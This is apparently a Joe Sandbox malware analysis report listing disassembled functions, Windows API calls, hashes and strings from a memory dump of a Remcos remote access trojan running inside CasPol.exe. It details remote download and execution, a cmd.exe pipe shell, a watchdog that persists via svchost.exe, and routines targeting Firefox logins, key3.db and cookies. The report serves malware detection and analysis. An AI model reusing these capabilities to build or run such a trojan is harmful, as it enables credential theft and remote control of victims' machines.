                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                                                                                                                                  Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: recv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                                                                                                                  • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                  • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                                                                                                                                  Function 0042610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2809346765-0
                                                                                                                                                                                                                                  • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                                                                  • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                                                                                                                                  Function 0040262E Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Deallocate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1075933841-0
                                                                                                                                                                                                                                  • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                                  • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                                                                                                                                  Function 10007DE0 Relevance: 1.3, APIs: 1, Instructions: 28sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 10007E20: FindFirstFileW.KERNEL32(?,?,?,00000000,75570F00), ref: 10007ED1
                                                                                                                                                                                                                                    • Part of subcall function 10007E20: FindNextFileW.KERNELBASE(00000000,?,?,00000000,75570F00), ref: 10007F0A
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 10007E03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$FirstNextSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2635277345-0
                                                                                                                                                                                                                                  • Opcode ID: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                  • Instruction ID: ba8769b27b28ad511b2499f2b98cea4f31d6ecccccff2d72c20009a19a29048a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AE08636F0125467A601D6AEDC8195BF3EDEB891A0B1100B6E90DD3301E871DD0142E1
                                                                                                                                                                                                                                  Function 00410ABE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                                                                                                  • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00406F28
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                                                                                                                                    • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                                                                                                                                    • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                                                                                                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                                                                                                                                    • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                                                                                                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                    • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                    • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                    • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                    • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000288,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(00000288,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                                                                                                                                    • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                    • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                    • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                                                                                                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                                                                                                                                    • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                                                                                                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                                                                                                                                  • API String ID: 2918587301-599666313
                                                                                                                                                                                                                                  • Opcode ID: 50e73a33b6ef1ff8e914a00898bc6f7894d442b86e537ee4705b72ee379ce38f
                                                                                                                                                                                                                                  • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50e73a33b6ef1ff8e914a00898bc6f7894d442b86e537ee4705b72ee379ce38f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                                                                                                                                                  Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                                                                                                                                    • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                                                                                    • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                                                                                                                                  • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                                                                                                                                  • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                                                                                                                                    • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                                                                                    • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000012C,00000093), ref: 0040523F
                                                                                                                                                                                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                                                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                                                                  • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                                                                                                                                                  • API String ID: 3815868655-81343324
                                                                                                                                                                                                                                  • Opcode ID: 3d2e7fcd9904bea199581b2d36fd21f78a04208000f5627f9ddf2270b822dfe6
                                                                                                                                                                                                                                  • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d2e7fcd9904bea199581b2d36fd21f78a04208000f5627f9ddf2270b822dfe6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                                                                                                                                                  Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                                                                  • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                                                                  • API String ID: 65172268-860466531
                                                                                                                                                                                                                                  • Opcode ID: 6cb90c24799a52b9daff74bd536492276d9664ab1cc401aaf178b25b8aac1b68
                                                                                                                                                                                                                                  • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cb90c24799a52b9daff74bd536492276d9664ab1cc401aaf178b25b8aac1b68
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                                                                                                                                  Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                                                  • API String ID: 1164774033-3681987949
                                                                                                                                                                                                                                  • Opcode ID: 8b8f82a643f35a99610966d45e920ea2d249c46f326294340934235e9e6ef364
                                                                                                                                                                                                                                  • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b8f82a643f35a99610966d45e920ea2d249c46f326294340934235e9e6ef364
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                                                                  Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                  • API String ID: 3527384056-432212279
                                                                                                                                                                                                                                  • Opcode ID: daa18327bdb53cfe7cb7a4aefc52122e2e13f856f6a04d4e17db2c25bacbd10c
                                                                                                                                                                                                                                  • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daa18327bdb53cfe7cb7a4aefc52122e2e13f856f6a04d4e17db2c25bacbd10c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                                                                                                                                  Function 10006FA0 Relevance: 19.7, APIs: 13, Instructions: 236COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000440,00000000,00000000), ref: 10007054
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3743895883-0
                                                                                                                                                                                                                                  • Opcode ID: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                  • Instruction ID: 3fc6cb16c2acb38648db70abfd8e28bf1beac7dae34e75593325fef57f3a6704
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3717FB1E00219BBFB10DBA4DC85FEE77B8EF04794F1041A5FA08E6195E7759A01CBA1
                                                                                                                                                                                                                                  Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
